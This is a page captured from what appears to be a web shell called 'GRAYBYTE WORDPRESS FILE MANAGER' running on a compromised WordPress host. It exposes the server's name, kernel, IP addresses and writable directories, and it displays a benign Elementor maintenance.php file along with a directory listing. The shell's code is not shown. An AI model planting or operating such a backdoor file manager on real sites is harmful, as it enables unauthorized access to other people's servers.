✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.105
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/tdhomesa/public_html/wp-content/plugins/elementor/includes//maintenance.php
<?php
namespace Elementor;

use Elementor\Core\Kits\Manager;
use Elementor\Core\Upgrade\Manager as Upgrade_Manager;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

/**
 * Elementor maintenance.
 *
 * Elementor maintenance handler class is responsible for setting up Elementor
 * activation and uninstallation hooks.
 *
 * @since 1.0.0
 */
class Maintenance {

	/**
	 * Activate Elementor.
	 *
	 * Set Elementor activation hook.
	 *
	 * Fired by `register_activation_hook` when the plugin is activated.
	 *
	 * @param bool $network_wide
	 * @since 1.0.0
	 * @access public
	 * @static
	 */
	public static function activation( $network_wide ) {
		wp_clear_scheduled_hook( 'elementor/tracker/send_event' );

		wp_schedule_event( time(), 'daily', 'elementor/tracker/send_event' );
		flush_rewrite_rules();

		if ( is_multisite() && $network_wide ) {
			static::create_default_kit(
				get_sites( [
					'fields' => 'ids',
				] )
			);

			return;
		}

		static::create_default_kit();
		static::insert_defaults_options();

		set_transient( 'elementor_activation_redirect', true, MINUTE_IN_SECONDS );
	}

	public static function insert_defaults_options() {
		$history = Upgrade_Manager::get_installs_history();
		if ( empty( $history ) ) {
			$default_options = [
				'elementor_font_display' => 'swap',
			];
			foreach ( $default_options as $option_name => $option_value ) {
				if ( \Elementor\Utils::is_empty( get_option( $option_name ) ) ) {
					add_option( $option_name, $option_value );
				}
			}
		}
	}

	public static function deactivation() {
		Api::get_deactivation_data();
	}

	/**
	 * Uninstall Elementor.
	 *
	 * Set Elementor uninstallation hook.
	 *
	 * Fired by `register_uninstall_hook` when the plugin is uninstalled.
	 *
	 * @since 1.0.0
	 * @access public
	 * @static
	 */
	public static function uninstall() {
		wp_clear_scheduled_hook( 'elementor/tracker/send_event' );

		Api::get_uninstalled_data();
	}

	/**
	 * Init.
	 *
	 * Initialize Elementor Maintenance.
	 *
	 * @since 1.0.0
	 * @access public
	 * @static
	 */
	public static function init() {
		register_activation_hook( ELEMENTOR_PLUGIN_BASE, [ __CLASS__, 'activation' ] );
		register_deactivation_hook( ELEMENTOR_PLUGIN_BASE, [ __CLASS__, 'deactivation' ] );
		register_uninstall_hook( ELEMENTOR_PLUGIN_BASE, [ __CLASS__, 'uninstall' ] );

		add_action( 'wpmu_new_blog', function ( $site_id ) {
			if ( ! is_plugin_active_for_network( ELEMENTOR_PLUGIN_BASE ) ) {
				return;
			}

			static::create_default_kit( [ $site_id ] );
		} );
	}

	/**
	 * @param array $site_ids
	 */
	private static function create_default_kit( array $site_ids = [] ) {
		if ( ! empty( $site_ids ) ) {
			foreach ( $site_ids as $site_id ) {
				switch_to_blog( $site_id );

				Manager::create_default_kit();

				restore_current_blog();
			}

			return;
		}

		Manager::create_default_kit();
	}
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
22 Jun 2026 6.38 AM
tdhomesa / tdhomesa
0755
admin-templates
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
base
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
controls
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
editor-templates
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
elements
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
interfaces
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
libraries
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
managers
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
settings
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
template-library
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
widgets
--
12 Jun 2026 10.25 AM
tdhomesa / tdhomesa
0755
api.php
8.67 KB
20 May 2026 4.19 PM
tdhomesa / tdhomesa
0644
autoloader.php
9.787 KB
21 Oct 2025 4.51 PM
tdhomesa / tdhomesa
0644
beta-testers.php
2.987 KB
23 Apr 2023 3.22 PM
tdhomesa / tdhomesa
0644
compatibility.php
10.958 KB
17 Mar 2025 5.28 PM
tdhomesa / tdhomesa
0644
conditions.php
2.703 KB
23 Apr 2023 3.22 PM
tdhomesa / tdhomesa
0644
db.php
15.895 KB
2 Feb 2026 2.52 PM
tdhomesa / tdhomesa
0644
editor-assets-api.php
4.111 KB
8 Jun 2026 4.48 PM
tdhomesa / tdhomesa
0644
embed.php
8.476 KB
17 Mar 2025 5.28 PM
tdhomesa / tdhomesa
0644
fonts.php
62.528 KB
17 Mar 2025 5.28 PM
tdhomesa / tdhomesa
0644
frontend.php
40.028 KB
20 Apr 2026 3.03 PM
tdhomesa / tdhomesa
0644
heartbeat.php
2.573 KB
23 Apr 2023 3.22 PM
tdhomesa / tdhomesa
0644
maintenance-mode.php
11.158 KB
21 Oct 2025 4.51 PM
tdhomesa / tdhomesa
0644
maintenance.php
2.813 KB
17 Mar 2025 5.28 PM
tdhomesa / tdhomesa
0644
plugin.php
16.682 KB
26 May 2026 12.54 PM
tdhomesa / tdhomesa
0644
preview.php
7.926 KB
20 May 2026 4.19 PM
tdhomesa / tdhomesa
0644
rollback.php
4.155 KB
20 Jan 2026 1.22 PM
tdhomesa / tdhomesa
0644
shapes.php
7.812 KB
5 Aug 2025 6.00 PM
tdhomesa / tdhomesa
0644
stylesheet.php
8.91 KB
15 Sep 2025 2.10 PM
tdhomesa / tdhomesa
0644
tracker.php
16.999 KB
10 Nov 2025 4.25 PM
tdhomesa / tdhomesa
0644
user-data.php
3.439 KB
21 Oct 2025 4.51 PM
tdhomesa / tdhomesa
0644
user.php
9.99 KB
4 Dec 2025 10.09 PM
tdhomesa / tdhomesa
0644
utils.php
24.876 KB
8 Jun 2026 4.48 PM
tdhomesa / tdhomesa
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF